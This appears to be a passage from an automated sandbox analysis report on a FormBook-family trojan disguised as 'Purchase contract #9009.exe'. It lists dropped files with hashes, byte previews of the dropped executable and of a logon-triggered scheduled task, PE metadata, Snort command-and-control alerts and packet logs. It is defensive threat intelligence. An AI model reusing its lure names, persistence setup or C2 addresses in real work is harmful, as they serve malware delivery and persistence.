                                                                      • 204.11.56.48
                                                                      367006.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                      • 208.91.197.91
                                                                      i2Kzh5TEhc.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      PURCHASE ORDER 72121.exeGet hashmaliciousBrowse
                                                                      • 209.99.64.70
                                                                      MtYE4LZNQy.exeGet hashmaliciousBrowse
                                                                      • 204.11.56.48
                                                                      Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                      • 204.11.56.48
                                                                      mal.exeGet hashmaliciousBrowse
                                                                      • 209.99.64.55

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase contract #9009.exe.log
                                                                      Process:C:\Users\user\Desktop\Purchase contract #9009.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.355304211458859
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                      C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp
                                                                      Process:C:\Users\user\Desktop\Purchase contract #9009.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1647
                                                                      Entropy (8bit):5.185166623696177
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGLctn:cbhK79lNQR/rydbz9I3YODOLNdq3d
                                                                      MD5:DBC6829B9589157749F36B1FBFB0C16A
                                                                      SHA1:349367F290361292984092C261B40AC8645295D8
                                                                      SHA-256:60313E8BE69B2E73836A15F6C3F83272451E6CD5CCD088CCCC7958B811D5B5A4
                                                                      SHA-512:F666239071ED7CB4E9E365CD02DF45E7915A9EE5871068A85997C547EE4D8517B0B56A73C6E2D3D907CE43C934B34AFA96225A7D842B2352485F00BAED89A5FC
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                      C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe
                                                                      Process:C:\Users\user\Desktop\Purchase contract #9009.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1374720
                                                                      Entropy (8bit):7.058380296596083
                                                                      Encrypted:false
                                                                      SSDEEP:24576:LqLjSezWFCtd3NYSXtTTlQvTuZlZcjOsZ3OQ:YjpwCt3VtTGdrO
                                                                      MD5:ACFF75235867DD82B2679B4AFD3AD525
                                                                      SHA1:072839587FC2C193AFD5963C467502BE89815C2A
                                                                      SHA-256:84F6BEEECFC24544DF0A59C7B7F0961C44D835F95F23289DAC5730DECC2D4957
                                                                      SHA-512:FFE192E1FF46DAE3444CAB30721B6D9C7A64374ED2F6356E3033DCABCBE55614E020BB11A20A188CF7B12616608E3F247FBB6BB43C970B17D6703C019A866463
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 37%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.a..............P..............#... ...@....@.. .......................`............@.................................."..O....@.......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......@......................@..B................."......H.......L....8......M........F............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o-...(......t$....+..*Vs....(/...t.........*..(0...*.0..........
                                                                      C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\Purchase contract #9009.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.058380296596083
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Purchase contract #9009.exe
                                                                      File size:1374720
                                                                      MD5:acff75235867dd82b2679b4afd3ad525
                                                                      SHA1:072839587fc2c193afd5963c467502be89815c2a
                                                                      SHA256:84f6beeecfc24544df0a59c7b7f0961c44d835f95f23289dac5730decc2d4957
                                                                      SHA512:ffe192e1ff46dae3444cab30721b6d9c7a64374ed2f6356e3033dcabcbe55614e020bb11a20a188cf7b12616608e3f247fbb6bb43c970b17d6703c019a866463
                                                                      SSDEEP:24576:LqLjSezWFCtd3NYSXtTTlQvTuZlZcjOsZ3OQ:YjpwCt3VtTGdrO
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.a..............P..............#... ...@....@.. .......................`............@................................

                                                                      File Icon

                                                                      Icon Hash:f0c2a07179b396e8

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x512316
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x610951BE [Tue Aug 3 14:25:02 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1122c40x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x3f080.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1540000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x11031c0x110400False0.615119590794data6.97011388032IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x1140000x3f0800x3f200False0.744001392327data7.06520679003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x1540000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x1141e00x103e6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0x1245d80x10318PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0x1349000x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0x1451380x94a8data
                                                                      RT_ICON0x14e5f00x25a8data
                                                                      RT_ICON0x150ba80x10a8data
                                                                      RT_ICON0x151c600x988data
                                                                      RT_ICON0x1525f80x468GLS_BINARY_LSB_FIRST
                                                                      RT_GROUP_ICON0x152a700x76data
                                                                      RT_VERSION0x152af80x388data
                                                                      RT_MANIFEST0x152e900x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright Bloodknight Studios, Slayin
                                                                      Assembly Version1.0.0.9
                                                                      InternalNameSTATS.exe
                                                                      FileVersion1.0.0.9
                                                                      CompanyNameBloodknight Studios
                                                                      LegalTrademarks
                                                                      CommentsCharacter Stat Calc
                                                                      ProductNameStatCalc
                                                                      ProductVersion1.0.0.9
                                                                      FileDescriptionAstonia Calc
                                                                      OriginalFilenameSTATS.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      08/03/21-22:58:13.679682TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.4160.153.136.3
                                                                      08/03/21-22:58:13.679682TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.4160.153.136.3
                                                                      08/03/21-22:58:13.679682TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.4160.153.136.3
                                                                      08/03/21-22:58:24.895253TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.4
                                                                      08/03/21-22:58:35.005968TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                      08/03/21-22:58:35.005968TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                      08/03/21-22:58:35.005968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                      08/03/21-22:58:35.119534TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                      08/03/21-22:58:40.275066TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.495.215.210.10
                                                                      08/03/21-22:58:40.275066TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.495.215.210.10
                                                                      08/03/21-22:58:40.275066TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.495.215.210.10
                                                                      08/03/21-22:58:45.724737TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.189
                                                                      08/03/21-22:58:45.724737TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.189
                                                                      08/03/21-22:58:45.724737TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.189

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Aug 3, 2021 22:56:54.883275986 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.884922981 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.897732019 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.899957895 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.901479959 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902091980 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902117014 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902137041 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902149916 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902168989 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902188063 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902201891 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902220011 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902219057 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.902231932 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.902241945 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.902260065 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.902264118 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.902298927 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.912575006 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.914377928 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.917798996 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.917821884 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.917927980 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.917967081 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.918020010 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.918028116 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.922960043 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.931168079 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.931186914 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.931200027 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.931211948 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.931282997 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.931324959 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.931992054 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.932008982 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.932380915 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.932415962 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.932787895 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.932917118 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.936875105 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.940601110 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941054106 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941111088 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941132069 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941145897 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.941155910 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941167116 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.941176891 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.941201925 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.941234112 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:54.959063053 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.959100008 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:54.959258080 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.441118002 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.450504065 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.458353996 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.458400965 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.458540916 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.458579063 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.458746910 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.458795071 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.458823919 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.458854914 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.459662914 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.459705114 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.459733009 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.459763050 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.460089922 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.460520029 CEST4434972123.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.460593939 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.467734098 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.467771053 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.467833042 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.468106985 CEST4434972423.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.468179941 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.468197107 CEST49724443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.476695061 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.477050066 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.477092981 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.477113962 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.477130890 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.477137089 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.477170944 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.477180004 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.477221966 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.479034901 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.479072094 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.479101896 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.479129076 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.481038094 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.481080055 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.481105089 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.481123924 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.482256889 CEST49721443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.483006954 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.483051062 CEST4434972623.211.6.115192.168.2.4
                                                                      Aug 3, 2021 22:56:55.483063936 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.483092070 CEST49726443192.168.2.423.211.6.115
                                                                      Aug 3, 2021 22:56:55.484970093 CEST4434972623.211.6.115192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Aug 3, 2021 22:56:55.631777048 CEST5309753192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:56:55.656511068 CEST53530978.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:56:56.432280064 CEST4925753192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:56:56.460036993 CEST53492578.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:56:57.535749912 CEST6238953192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:56:57.561770916 CEST53623898.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:01.884814024 CEST4991053192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:01.917426109 CEST53499108.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:02.957917929 CEST5585453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:02.985668898 CEST53558548.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:04.092080116 CEST6454953192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:04.127470970 CEST53645498.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:04.775495052 CEST6315353192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:04.803308010 CEST53631538.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:05.830054045 CEST5299153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:05.855159044 CEST53529918.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:07.532464981 CEST5370053192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:07.558717012 CEST53537008.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:08.527148962 CEST5172653192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:08.552383900 CEST53517268.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:09.575867891 CEST5679453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:09.611171961 CEST53567948.8.8.8192.168.2.4
